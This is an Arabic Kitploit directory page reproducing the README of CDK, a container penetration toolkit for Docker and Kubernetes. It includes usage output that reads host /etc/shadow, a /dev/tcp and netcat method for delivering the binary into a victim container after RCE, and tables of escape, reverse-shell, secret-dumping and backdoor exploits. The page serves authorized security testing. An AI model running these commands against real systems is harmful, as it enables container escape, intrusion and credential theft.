Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CDK — 📦 جعل اختبار الأمان لـ K8s و Docker و Containerd أسهل. | Kitploit
أدوات/GitHubGitHub/cdk-team/cdk
تصعيد الامتيازاتالاستطلاعأمن الحاوياتآليات الاستمراريةالاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراقأمن السحابةالهروب من الحاوية
GitHubcdk-team/cdk

CDK

4.7k606منذ 3 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

📦 جعل اختبار الأمان لـ K8s و Docker و Containerd أسهل.

عرض المستودعالموقع الإلكتروني

CDK - مجموعة أدوات اختراق الحاويات بدون تبعيات

الإنجليزية | 简体中文

png

إخلاء مسؤولية قانوني

استخدام CDK لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. CDK مخصص لأغراض اختبار الأمان فقط.

نظرة عامة

CDK هي مجموعة أدوات مفتوحة المصدر لاختراق الحاويات، مصممة لتوفير استغلال مستقر في حاويات مختلفة مبسطة دون أي اعتماد على نظام التشغيل. تأتي مع أدوات شبكة مفيدة والعديد من البراهين/الاستغلالات القوية وتساعدك على الهروب من الحاوية والسيطرة على مجموعة K8s بسهولة.

بداية سريعة

شغّل cdk eva للحصول على معلومات التقييم واستغلال موصى به، ثم شغّل cdk run لبدء الهجوم.

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

التثبيت/التسليم

قم بتنزيل أحدث إصدار من https://github.com/cdk-team/CDK/releases/

ضع الملفات التنفيذية في الحاوية الهدف وابدأ الاختبار.

نصائح: تسليم CDK إلى الحاوية الهدف في اختبار الاختراق الفعلي

إذا كان لديك استغلال يمكنه تحميل ملف، فيمكنك تحميل ملف CDK الثنائي مباشرة.

إذا كان لديك استغلال RCE، ولكن الحاوية الهدف لا تحتوي على curl أو wget، فيمكنك استخدام الطريقة التالية لتسليم CDK:

  1. أولاً، استضف ملف CDK الثنائي على مضيفك بعنوان IP عام.
root@kitploit:~
(على مضيفك)
nc -lvp 999 < cdk
  1. داخل الحاوية الضحية، قم بتنفيذ
root@kitploit:~
cat < /dev/tcp/(عنوان_ip_العام_لمضيفك)/(المنفذ) > cdk
chmod a+x cdk

الاستخدام

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

الميزات

يحتوي CDK على ثلاث وحدات:

  1. التقييم: جمع المعلومات داخل الحاوية للعثور على نقاط الضعف المحتملة.
  2. الاستغلال: هروب الحاوية، الثبات والحركة الجانبية.
  3. الأداة: أدوات الشبكة وواجهات برمجة التطبيقات لطلبات TCP/HTTP والأنفاق وإدارة مجموعة K8s.

وحدة التقييم

الاستخدام

root@kitploit:~
cdk evaluate [--full]

وحدة الاستغلال

قائمة بجميع الاستغلالات المتاحة:

root@kitploit:~
cdk run --list

تشغيل استغلال مستهدف:

root@kitploit:~
cdk run <اسم-النص> [خيارات]

ملاحظة حول Thin: إصدار thin مُعد للحاويات قصيرة العمر مثل وظائف serverless. نضيف علامات بناء في الكود المصدري ونقص بعض الاستغلالات لجعل الملف الثنائي أخف. يحتوي ملف الـ 2MB على 90% من وظائف CDK، كما يمكنك اختيار استغلالات مفيدة من كود CDK المصري لبناء ثنائي خفيف خاص بك.

وحدة الأداة

تشغيل الأوامر كما في لينكس، مع اختلاف طفيف في وسائط الإدخال، راجع رابط الاستخدام.

root@kitploit:~
cdk nc [خيارات]
cdk ps

وثيقة الإصدار

إذا كنت تريد معرفة كيف أصدرنا إصدارًا جديدًا، وكيف يتم إنتاج thin، ولماذا نقدم إصدارات upx، وما الفروق بين الإصدارات المختلفة (all, normal, thin, upx)، وكيفية اختيار استغلالات وأدوات CDK محددة لتجميع إصدار خاص بك، يرجى مراجعة وثيقة الإصدار.

وثائق المطور

  • تشغيل الاختبار في الحاوية.

المساهمة في CDK

أولاً، شكرًا على الوقت الذي خصصته للمساهمة!

شكرًا للمساهمين التاليين:

المزيد من المساهمين: قائمة المساهمين

الإبلاغ عن الأخطاء

يتم تتبع الأخطاء كـ مشكلات GitHub. أنشئ مشكلة تتضمن إصدار CDK الحالي ورسالة الخطأ والبيئة. صف الخطوات الدقيقة التي تعيد إنتاج المشكلة.

اقتراح التحسينات

يتم تتبع اقتراحات التحسين كـ مناقشات GitHub. يمكنك نشر أي أفكار هنا لمناقشة المطورين مباشرة.

طلبات السحب (Pull Requests)

إصلاح المشكلات أو الحفاظ على جودة CDK:

  • صف إصدار CDK الحالي والبيئة والمشكلة والخطوات الدقيقة التي تعيد إنتاج المشكلة.
  • لقطات شاشة أو سجلات قبل وبعد إصلاح المشكلة.

ميزة جديدة أو استغلالات:

  • اشرح لماذا سيكون هذا التحسين مفيدًا للمستخدمين الآخرين.
  • يرجى توفير بيئة مستدامة لنا لمراجعة المساهمات.
  • لقطات شاشة حول كيفية عمل هذه الميزة الجديدة.
  • إذا كنت تقدم برامج تقييم/استغلال جديدة، يرجى إضافة وثيقة بسيطة إلى رسالة PR الخاصة بك، إليك مثال.

الأحداث

404StarLink 2.0 - Galaxy

png

مشروع CDK أصبح الآن مضمنًا في مشروع 404Team Starlink Project 2.0. انضم إلى مجتمع StarLink للتواصل مع فريق تطوير CDK.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • إيجاز: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
تنزيل الأداة
التكتيكاتالنصمدعومالاستخدام/مثال
جمع المعلوماتمعلومات نظام التشغيل الأساسية✔link
جمع المعلوماتالإمكانيات المتاحة✔link
جمع المعلوماتأوامر لينكس المتاحة✔link
جمع المعلوماتالتركيبات✔link
جمع المعلوماتمساحة اسم الشبكة✔link
جمع المعلوماتالمتغيرات البيئية الحساسة✔link
جمع المعلوماتالعمليات الحساسة✔link
جمع المعلوماتالملفات المحلية الحساسة✔link
جمع المعلوماتتوجيه Kube-proxy للشبكة المحلية (CVE-2020-8558)✔link
جمع المعلوماتاكتشاف الخدمة المستند إلى DNS✔link
الاكتشافمعلومات خادم K8s Api✔link
الاكتشافمعلومات حساب خدمة K8s✔link
الاكتشافواجهة برمجة تطبيقات بيانات تعريف مزود السحابة✔link
التكتيكالتقنيةاسم استغلال CDKمدعومفي Thinالوثائق
الهروبdocker-runc CVE-2019-5736runc-pwn✔✔
الهروبcontainerd-shim CVE-2020-15257shim-pwn✔link
الهروبdocker.sock PoC (هجوم DIND)docker-sock-check✔✔link
الهروبdocker.sock RCEdocker-sock-pwn✔✔link
الهروبDocker API(2375) RCEdocker-api-pwn✔✔link
الهروبهروب تركيب الجهازmount-disk✔✔link
الهروبهروب LXCFSlxcfs-rw✔✔link
الهروبهروب Cgroupsmount-cgroup✔✔link
الهروبإساءة استخدام هروب مساحة اسم المستخدم غير المميز CVE-2022-0492abuse-unpriv-userns✔✔link
الهروبهروب Procfsmount-procfs✔✔link
الهروبهروب Ptrace PoCcheck-ptrace✔✔link
الهروبإعادة كتابة Cgroup(devices.allow)rewrite-cgroup-devices✔✔link
الهروبقراءة ملف عشوائي من النظام المضيف (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔link
الاكتشافتحليل مكونات K8sservice-probe✔✔link
الاكتشافتفريغ بيانات Istio Sidecaristio-check✔✔link
الاكتشافتفريغ سياسات أمان بود K8sk8s-psp-dump✔link
التحكم عن بُعدشل عكسيreverse-shell✔✔link
التحكم عن بُعدKubelet Execkubelet-exec✔✔
الوصول إلى بيانات الاعتمادهجوم القوة القصيرة على السجلregistry-brute✔✔link
الوصول إلى بيانات الاعتمادفحص مفتاح الوصولak-leakage✔✔link
الوصول إلى بيانات الاعتمادEtcd الحصول على رمز K8setcd-get-k8s-token✔✔
الوصول إلى بيانات الاعتمادتفريغ أسرار K8sk8s-secret-dump✔✔link
الوصول إلى بيانات الاعتمادتفريغ تكوين K8sk8s-configmap-dump✔✔link
تصعيد الامتيازاتتجاوز K8s RBACk8s-get-sa-token✔✔link
تصعيد الامتيازاتCVE-2026-31431 copy-fail (غير الجذر→جذر و x86_64 فقط)copy-fail-cve-2026-31431✔link
الثباتنشر WebShellwebshell-deploy✔✔link
الثباتنشر بود خلفيk8s-backdoor-daemonset✔✔link
الثباتنشر ظل K8s api-serverk8s-shadow-apiserver✔link
الثباتهجوم K8s MITM (CVE-2020-8554)k8s-mitm-clusterip✔✔link
الثباتنشر وظيفة CronJob في K8sk8s-cronjob✔✔link
الأمرالوصفمدعومالاستخدام/مثال
ncنفق TCP✔link
psمعلومات العمليات✔link
netstatمثل أمر "netstat -antup"✔
ifconfigمعلومات الشبكة✔link
viتحرير الملفات✔link
ectlتعداد غير مصرح به لمفاتيح ectd✔
kcurlطلب إلى خادم K8s api-server✔link
dcurlطلب إلى Docker HTTP API✔link
ucurlطلب إلى Docker Unix Socket✔link
rcurlطلب إلى Docker Registry API
probeفحص IP/المنفذ✔link